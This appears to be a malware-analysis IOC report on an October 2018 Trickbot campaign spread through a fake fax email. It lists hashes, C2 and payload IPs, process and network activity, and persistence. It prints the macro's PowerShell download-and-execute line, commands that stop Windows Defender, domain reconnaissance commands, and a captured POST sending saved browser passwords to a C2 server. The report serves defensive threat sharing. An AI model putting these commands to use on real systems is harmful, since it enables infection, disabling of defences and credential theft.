#Trickbot_051018

1. #IOC #OptiData #VR #Trickbot #W97M #macro #powershell
2.  
3. https://pastebin.com/75KNqwCf
4. https://radetskiy.wordpress.com/?s=trickbot
5. https://myonlinesecurity.co.uk/trickbot-via-new-fax-message-malspam/
6.  
7. shema
8. --------------
9. email > attach (doc) > macro > powershell > GET 2URL > \AppData\Local\Temp\which.exe
10.  
11. email_headers
12. --------------
13. Received: from confidentialfax.com ([95.211.242.199])
14. by mail1.victim.com for <user1@org1.victim.com>;
15. Fri, 5 Oct 2018 13:45:12 +0300 (EEST) (envelope-from noreply-user1=org1.victim.com@confidentialfax.com)
16. Received: by confidentialfax.com id hmt0jtcpsj86 for <user1@org1.victim.com>;
17. Fri, 5 Oct 2018 06:29:00 -0400 (envelope-from <noreply-user1=org1.victim.com@confidentialfax.com>)
18. Subject: New fax message
19. From: "Confidential Fax" <noreply@confidentialfax.com>
20. Date: Fri, 5 Oct 2018 06:29:00 -0400
21. To: user1@org1.victim.com
22.  
23. files
24. --------------
25. SHA-256 03456acb1cd591086282e3356a2978cb95de1ed5d17c00ce982e391c92efdbd2
26. File name Fax.doc
27. File size 63 KB
28.  
29. SHA-256 b769c3aff961c8a3db3884d5470560d1ba23f1d4d7ff062c899fca1d3829c30a
30. File name ch.rome !This program cannot be run in DOS mode.
31. File size 557.3 KB
32.  
33. SHA-256 6b58797cbdbe8afc9a93230bd8275202d88c94c10aa051721908ec31deea9c8c
34. File name radiance.png !This program cannot be run in DOS mode.
35. File size 492 KB
36.  
37. SHA-256 3558a4b7210b316afcd175c072b11bed5662296082b3d5c0a8b82c4d9a393f22
38. File name table.png !This program cannot be run in DOS mode.
39. File size 492 KB
40.  
41. macro
42. --------------
43. powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''C:\Users\admin\AppData\Local\Temp\which.exe'');start-process ''C:\Users\admin\AppData\Local\Temp\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\symbol.bat; start-process 'C:\Users\admin\AppData\Local\Temp\symbol.bat' -windowstyle hidden"
44.  
45. payload_sources
46. --------------
47. 107.180.51.22 pixandflix{.} com/ch.rome
48. 107.180.51.22 wedannouncements{.} com/ch.rome
49.  
50. activity
51. **************
52.  
53. proc
54. --------------
55. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
56. C:\Windows\SysWOW64\cmd.exe /c powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''%tmp%\which.exe'');start-process ''%tmp%\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath %tmp%\symbol.bat; start-process '%tmp%\symbol.bat' -windowstyle hidden"
57. C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\symbol.bat" "
58. "C:\tmp\which.exe"
59. C:\Windows\SysWOW64\cmd.exe
60. /c sc stop WinDefend
61. /c sc delete WinDefend
62. /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
63. C:\Users\operator\AppData\Roaming\AMNI\which.exe
64. C:\Windows\SysWOW64\cmd.exe
65. /c sc stop WinDefend
66. /c sc delete WinDefend
67. /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
68. C:\Windows\system32\svchost.exe
69. C:\Windows\system32\cmd.exe
70. /c ipconfig /all
71. /c net config workstation
72. /c net view /all
73. /c net view /all /domain
74. /c nltest /domain_trusts
75. /c nltest /domain_trusts /all_trusts
76. C:\Windows\system32\svchost.exe
77.  
78. netwrk
79. --------------
80. 107.180.51.22 pixandflix.com GET /ch.rome HTTP/1.1 no User Agent !This program cannot be run in DOS mode.
81. 185.17.123.2 185.17.123.2 GET /radiance.png HTTP/1.1 no User Agent !This program cannot be run in DOS mode.
82. 185.17.123.2 185.17.123.2 GET /table.png HTTP/1.1 WinHTTP loader/1.0 !This program cannot be run in DOS mode.
83. 185.17.123.2 185.17.123.2 GET /table.png HTTP/1.1 WinHTTP loader/1.0 !This program cannot be run in DOS mode.
84. 37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1 Mozilla/4.0
85. 37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1 Mozilla/4.0
86. 37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/90 HTTP/1.1 test
87. 37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ TTP/1.1 Mozilla/4.0
88.  
89. comp
90. --------------
91. powershell.exe 1568 107.180.51.22 80 ESTABLISHED
92. svchost.exe 2976 47.52.62.55 443 ESTABLISHED
93. svchost.exe 2976 192.252.209.44 443 ESTABLISHED
94. svchost.exe 2976 2.21.89.57 80 ESTABLISHED
95. svchost.exe 2976 82.146.41.218 447 ESTABLISHED
96. svchost.exe 3136 200.29.24.36 8082 SYN_SENT
97. svchost.exe 3384 185.17.123.2 80 ESTABLISHED
98. svchost.exe 3136 24.130.135.200 80 SYN_SENT
99. svchost.exe 420 77.37.142.203 8082 SYN_SENT
100. svchost.exe 3136 177.0.69.68 80 SYN_SENT
101. svchost.exe 3136 107.175.247.166 443 SYN_SENT
102. svchost.exe 3136 172.81.135.139 443 SYN_SENT
103. svchost.exe 3136 200.29.24.36 8082 SYN_SENT
104.  
105. persist
106. --------------
107. Task Scheduler
108. \Msnetcs c:\users\operator\appdata\roaming\amni\which.exe 05.10.2018 10:59
109.  
110. stealing_passwd
111. **************
112. POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1
113. Accept: */*
114. User-Agent: Mozilla/4.0
115. Host: 37.128.229.30
116. -----------DEAFJJDLMELQCBHP
117. Content-Disposition: form-data; name="data"
118.  
119. http://www.i.ua|oper|****** (saved passwd)
120. https://www.ukr.net|11oper|****** (saved passwd)
121. https://accounts.google.com|oper11.wdma@gmail.com|****** (saved passwd)
122. https://login.live.com|oper11.wdma@gmail.com|****** (saved passwd)
123.  
124. -----------DEAFJJDLMELQCBHP
125. Content-Disposition: form-data; name="source"
126.  
127. firefox passwords
128. -----------DEAFJJDLMELQCBHP--
129.  
130. (!) ff only, no chrome
131.  
132. get_sys_info
133. **************
134. POST /ser1005/APM11_W617601.595544C8808D034FD9E85B5C4F5C2BEB/90 HTTP/1.1
135. Content-Type: multipart/form-data; boundary=Arasfjasu7
136. User-Agent: test
137. Host: 37.128.229.30
138.  
139. --Arasfjasu7
140. Content-Disposition: form-data; name="proclist"
141.  
142. ***PROCESS LIST***
143.  
144. [System Process]
145. System
146. smss.exe
147. csrss.exe
148. wininit.exe
149. csrss.exe
150. winlogon.exe
151. . . .
152.  
153. --Arasfjasu7
154. Content-Disposition: form-data; name="sysinfo"
155.  
156. ***SYSTEMINFO***
157.  
158. Host Name - APM11
159. OS Name - Microsoft Windows 7 ..........................
160. OS Version - Service Pack 1
161. OS Architecture - 64-bit
162. Product Type - Workstation
163. Build Type - Multiprocessor Free
164. Registered Owner - operator
165. Registered Organization -
166. . . .
167. /c ipconfig /all
168. /c net config workstation
169. /c net view /all
170. /c net view /all /domain
171. /c nltest /domain_trusts
172. /c nltest /domain_trusts /all_trusts
173.  
174. # # #
175. https://www.virustotal.com/#/file/03456acb1cd591086282e3356a2978cb95de1ed5d17c00ce982e391c92efdbd2/community
176. https://www.virustotal.com/#/file/b769c3aff961c8a3db3884d5470560d1ba23f1d4d7ff062c899fca1d3829c30a/community
177. https://www.virustotal.com/#/file/6b58797cbdbe8afc9a93230bd8275202d88c94c10aa051721908ec31deea9c8c/detection
178. https://www.virustotal.com/#/file/3558a4b7210b316afcd175c072b11bed5662296082b3d5c0a8b82c4d9a393f22/detection
179. https://analyze.intezer.com/#/analyses/0a02c369-9b18-4711-ba78-cb38aaed2184
180. https://analyze.intezer.com/#/analyses/d2aea4cc-8c6c-4f60-80e1-e946b5f14f64
181. https://analyze.intezer.com/#/analyses/7f767ab6-9865-441e-a9de-9bdd7c4c6bff